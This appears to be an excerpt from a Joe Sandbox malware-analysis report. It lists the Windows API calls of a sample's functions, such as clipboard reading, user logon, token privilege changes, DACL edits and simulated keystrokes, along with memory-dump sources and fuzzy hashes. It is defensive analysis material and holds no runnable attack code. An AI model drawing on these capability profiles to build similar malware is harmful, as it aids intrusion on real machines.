                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                                                                                        • Instruction ID: e3fdca1bd9b971a046894b3aa3ac286079517264a556a7e70bb7ea0c106ed27b
                                                                                                                        • Opcode Fuzzy Hash: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                                                                                        • Instruction Fuzzy Hash: 8AD06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1856020C736E821EB90
                                                                                                                        Function 0171F090 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0171F09B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                        • Instruction ID: 27e2a3b583c40f378c46d0dc5ed3aa40ccbc1d7911b8e9dfcc6b0fed228e7027
                                                                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                        • Instruction Fuzzy Hash: 69D0C77190620CEBCB10DFBC9D04ADAB7A8D705321F104755FD15C7281D9369A5497A5
                                                                                                                        Function 00511CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00511CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                                                                                        • Instruction ID: c4d423dec8d936809a059062ce4fa6cb68b61af6229407aa99593c5eb325b763
                                                                                                                        • Opcode Fuzzy Hash: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                                                                                        • Instruction Fuzzy Hash: 96C09B352803449FF3184780BD8AF107754A36CB01F444401F6895D5E3C7B11814FA54
                                                                                                                        Function 01720AEC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction ID: ff10ab23838402021779dac57f400ffa0bdb878d78711d3d9e8f9e4c11125d0e
                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction Fuzzy Hash: 92E0BF7494010DEFDB10EFA4D9496DEBBB4EF04302F1005A1FD05D7681DB309E549A62
                                                                                                                        Function 01720AF0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction ID: 10e335ff931c4a0fc3f3ed9bcead61ffc8d982974585bac0f280f9e9edb6a289
                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction Fuzzy Hash: 45E0E67494010DDFDB00EFB4D94969EBFB4EF04302F100161FD01D2281D6309D509A72

                                                                                                                        Non-executed Functions

                                                                                                                        Function 005A9576 Relevance: 75.9, APIs: 39, Strings: 4, Instructions: 625windowkeyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005A961A
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A965B
                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 005A969F
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A96C9
                                                                                                                        • SendMessageW.USER32 ref: 005A96F2
                                                                                                                        • GetKeyState.USER32(00000011), ref: 005A978B
                                                                                                                        • GetKeyState.USER32(00000009), ref: 005A9798
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A97AE
                                                                                                                        • GetKeyState.USER32(00000010), ref: 005A97B8
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A97E9
                                                                                                                        • SendMessageW.USER32 ref: 005A9810
                                                                                                                        • SendMessageW.USER32(?,00001030,?,005A7E95), ref: 005A9918
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005A992E
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005A9941
                                                                                                                        • SetCapture.USER32(?), ref: 005A994A
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A99AF
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005A99BC
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A99D6
                                                                                                                        • ReleaseCapture.USER32 ref: 005A99E1
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A9A19
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005A9A26
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9A80
                                                                                                                        • SendMessageW.USER32 ref: 005A9AAE
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9AEB
                                                                                                                        • SendMessageW.USER32 ref: 005A9B1A
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005A9B3B
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 005A9B4A
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A9B68
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005A9B75
                                                                                                                        • GetParent.USER32(?), ref: 005A9B93
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9BFA
                                                                                                                        • SendMessageW.USER32 ref: 005A9C2B
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A9C84
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005A9CB4
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9CDE
                                                                                                                        • SendMessageW.USER32 ref: 005A9D01
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A9D4E
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005A9D82
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A9E05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                        • String ID: @GUI_DRAGID$@U=u$F$p#^
                                                                                                                        • API String ID: 3429851547-4253469085
                                                                                                                        • Opcode ID: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                                                                                        • Instruction ID: 8b808e43fcf4666124bd06d5fd4d09a42a9fe7d8a9a0dbda268f7e4305b14c51
                                                                                                                        • Opcode Fuzzy Hash: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                                                                                        • Instruction Fuzzy Hash: 8E427E34604251AFDB25CF28CC84AAEBFE5FF9A310F140A19F6998B2A1D731E854DF51
                                                                                                                        Function 005A4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005A48F3
                                                                                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 005A4908
                                                                                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 005A4927
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 005A494B
                                                                                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 005A495C
                                                                                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 005A497B
                                                                                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005A49AE
                                                                                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005A49D4
                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 005A4A0F
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A56
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A7E
                                                                                                                        • IsMenu.USER32(?), ref: 005A4A97
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4AF2
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4B20
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A4B94
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 005A4BE3
                                                                                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 005A4C82
                                                                                                                        • wsprintfW.USER32 ref: 005A4CAE
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4CC9
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4CF1
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A4D13
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4D33
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4D5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                        • String ID: %d/%02d/%02d$@U=u
                                                                                                                        • API String ID: 4054740463-2764005415
                                                                                                                        • Opcode ID: b53cf1990916259b6979721584fd6b92f4ecfde8e5ef31ab062c92eacc030165
                                                                                                                        • Instruction ID: ff3a53fc80c8389ccc4f5d2e9e7ab0a3bb3ed87342e9b58df4dc6d93e7d984d5
                                                                                                                        • Opcode Fuzzy Hash: b53cf1990916259b6979721584fd6b92f4ecfde8e5ef31ab062c92eacc030165
                                                                                                                        • Instruction Fuzzy Hash: 9312CC71600255ABEB258FA8DC49BAE7FF8BF86310F104529F516EB2E1DBB49940CF50
                                                                                                                        Function 0052F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0052F998
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0056F474
                                                                                                                        • IsIconic.USER32(00000000), ref: 0056F47D
                                                                                                                        • ShowWindow.USER32(00000000,00000009), ref: 0056F48A
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F494
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4AA
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0056F4B1
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4BD
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4CE
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4D6
                                                                                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0056F4DE
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F4E1
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F4F6
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F501
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F50B
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F510
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F519
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F51E
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F528
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F52D
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F530
                                                                                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0056F557
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                                                                                        • Instruction ID: 278717d20a80338e72325e7e96d7edf358076d615b21dfaf1c2bde6e3d2b49e1
                                                                                                                        • Opcode Fuzzy Hash: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                                                                                        • Instruction Fuzzy Hash: 30311D71E40218BBEB216BB55C4AFBF7E6CEB59B50F100466FA01E71D1CAB15D00ABA0
                                                                                                                        Function 00571201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                          • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                          • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00571286
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005712A8
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 005712B9
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005712D1
                                                                                                                        • GetProcessWindowStation.USER32 ref: 005712EA
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 005712F4
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00571310
                                                                                                                          • Part of subcall function 005710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                                                                                          • Part of subcall function 005710BF: CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                        • String ID: $default$winsta0$Z]
                                                                                                                        • API String ID: 22674027-3859823317
                                                                                                                        • Opcode ID: 1186ea522738ede7fb8eeb27b949c664c981485dbeff3b132aaf3f16bd70693f
                                                                                                                        • Instruction ID: fcdd763ae2acfa499678418ae0f127607029247847ce67abfbfdbfc937ca58c6
                                                                                                                        • Opcode Fuzzy Hash: 1186ea522738ede7fb8eeb27b949c664c981485dbeff3b132aaf3f16bd70693f
                                                                                                                        • Instruction Fuzzy Hash: 4881AF71900609AFDF219FA8EC49FEE7FBAFF05700F148129F918A61A0D7318944EB64
                                                                                                                        Function 00570B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                                                                                          • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                                                                                          • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                                                                                          • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570BCC
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570C00
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570C17
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00570C51
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570C6D
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570C84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570C8C
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00570C93
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570CB4
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00570CBB
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570CEA
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570D0C
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570D1E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D45
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570D4C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D55
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570D5C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D65
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570D6C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00570D78
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570D7F
                                                                                                                          • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
                                                                                                                          • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
                                                                                                                          • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4175595110-0
                                                                                                                        • Opcode ID: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
                                                                                                                        • Instruction ID: beedb129fadc94d7be722a950c97dc8b2c039ac6c1c8008448bc0a75d78e36c9
                                                                                                                        • Opcode Fuzzy Hash: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
                                                                                                                        • Instruction Fuzzy Hash: F4713C71A0020AEBDF10DFA5EC48FAEBFB8BF15310F148515E919A7291D771A905EB60
                                                                                                                        Function 0058EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(005ACC08), ref: 0058EB29
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0058EB37
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0058EB43
                                                                                                                        • CloseClipboard.USER32 ref: 0058EB4F
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0058EB87
                                                                                                                        • CloseClipboard.USER32 ref: 0058EB91
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0058EBBC
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0058EBC9
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0058EBD1
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0058EBE2
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0058EC22
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0058EC38
                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 0058EC44
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0058EC55
                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0058EC77
                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058EC94
                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058ECD2
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0058ECF3
                                                                                                                        • CountClipboardFormats.USER32 ref: 0058ED14
                                                                                                                        • CloseClipboard.USER32 ref: 0058ED59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 420908878-0
                                                                                                                        • Opcode ID: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
                                                                                                                        • Instruction ID: 0a8b4eff1b4c06f5b63da2787e81935f4f73e1d3a40baabb761e3da65b3ec795
                                                                                                                        • Opcode Fuzzy Hash: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
